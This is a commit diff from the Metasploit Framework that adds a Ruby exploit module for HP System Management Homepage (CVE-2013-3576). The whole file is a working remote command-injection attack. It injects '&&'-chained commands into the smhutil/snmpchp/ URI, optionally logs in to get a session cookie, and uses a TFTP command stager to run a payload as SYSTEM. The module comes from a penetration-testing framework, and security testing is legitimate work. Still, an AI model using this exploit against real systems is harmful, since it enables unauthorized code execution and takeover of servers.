Land rapid7#1992, @wchen-r7's exploit for HP System Management Hompage

jvazquez-r7 · jvazquez-r7 · commit 526b82ef6340 · 2013-06-20T10:34:58.000-05:00
diff --git a/modules/exploits/windows/http/hp_sys_mgmt_exec.rb b/modules/exploits/windows/http/hp_sys_mgmt_exec.rb
@@ -0,0 +1,178 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::CmdStagerTFTP
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "HP System Management Homepage JustGetSNMPQueue Command Injection",
+			'Description'    => %q{
+				This module exploits a vulnerability found in HP System Management Homepage.  By
+				supplying a specially crafted HTTP request, it is possible to control the
+				'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),
+				which will be used in a exec() function.  This results in arbitrary code execution
+				under the context of SYSTEM.  Please note: In order for the exploit to work, the
+				victim must enable the 'tftp' command, which is the case by default for systems
+				such as Windows XP, 2003, etc.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Markus Wulftange',
+					'sinn3r'  #Metasploit
+				],
+			'References'     =>
+				[
+					['CVE', '2013-3576'],
+					['OSVDB', '94191'],
+					['US-CERT-VU', '735364']
+				],
+			'Payload'        =>
+				{
+					'BadChars' => "\x00"
+				},
+			'DefaultOptions' =>
+				{
+					'SSL' => true
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					['Windows', {}],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Jun 11 2013",
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				Opt::RPORT(2381),
+				# USERNAME/PASS may not be necessary, because the anonymous access is possible
+				OptString.new("USERNAME", [false, 'The username to authenticate as']),
+				OptString.new("PASSWORD", [false, 'The password to authenticate with'])
+			], self.class)
+	end
+
+
+	def peer
+		"#{rhost}:#{rport}"
+	end
+
+
+	def check
+		cookie = ''
+
+		if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
+			cookie = login
+			if cookie.empty?
+				print_error("#{peer} - Login failed")
+				return Exploit::CheckCode::Safe
+			else
+				print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
+			end
+		end
+
+		sig = Rex::Text.rand_text_alpha(10)
+		cmd = Rex::Text.uri_encode("echo #{sig}")
+		uri = normalize_uri("smhutil", "snmpchp/") + "&&#{cmd}&&echo"
+
+		req_opts = {}
+		req_opts['uri'] = uri
+		if not cookie.empty?
+			browser_chk = 'HPSMH-browser-check=done for this session'
+			curl_loc    = "curlocation-#{datastore['USERNAME']}="
+			req_opts['cookie'] = "#{cookie}; #{browser_chk}; #{curl_loc}"
+		end
+
+		res = send_request_raw(req_opts)
+		if not res
+			print_error("#{peer} - Connection timed out")
+			return Exploit::CheckCode::Unknown
+		end
+
+		if res.body =~ /SNMP data engine output/ and res.body =~ /#{sig}/
+			return Exploit::CheckCode::Vulnerable
+		end
+
+		Exploit::CheckCode::Safe
+	end
+
+
+	def login
+		username = datastore['USERNAME']
+		password = datastore['PASSWORD']
+
+		cookie = ''
+
+		res = send_request_cgi({
+			'method' => 'POST',
+			'uri'    => '/proxy/ssllogin',
+			'vars_post' => {
+				'redirecturl'         => '',
+				'redirectquerystring' => '',
+				'user'                => username,
+				'password'            => password
+			}
+		})
+
+		if not res
+			fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out during login")
+		end
+
+		# CpqElm-Login: success
+		if res.headers['CpqElm-Login'].to_s =~ /success/
+			cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
+		end
+
+		cookie
+	end
+
+
+	def setup_stager
+		execute_cmdstager({ :temp => '.'})
+	end
+
+
+	def execute_command(cmd, opts={})
+		# Payload will be: C:\hp\hpsmh\data\htdocs\smhutil
+		uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo")
+
+		req_opts = {}
+		req_opts['uri'] = uri
+		if not @cookie.empty?
+			browser_chk = 'HPSMH-browser-check=done for this session'
+			curl_loc    = "curlocation-#{datastore['USERNAME']}="
+			req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
+		end
+
+		print_status("#{peer} - Executing: #{cmd}")
+		res = send_request_raw(req_opts)
+	end
+
+
+	def exploit
+		@cookie = ''
+
+		if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
+			@cookie = login
+			if @cookie.empty?
+				fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed")
+			else
+				print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
+			end
+		end
+
+		@uri = normalize_uri('smhutil', 'snmpchp/') + "&&"
+		setup_stager
+	end
+end
